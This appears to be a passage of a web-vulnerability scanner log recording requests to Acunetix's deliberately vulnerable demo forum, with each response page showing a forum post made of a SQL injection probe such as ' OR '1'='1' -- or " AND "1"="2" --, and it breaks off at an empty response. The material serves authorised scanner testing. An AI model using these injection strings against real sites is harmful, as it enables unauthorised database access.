<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
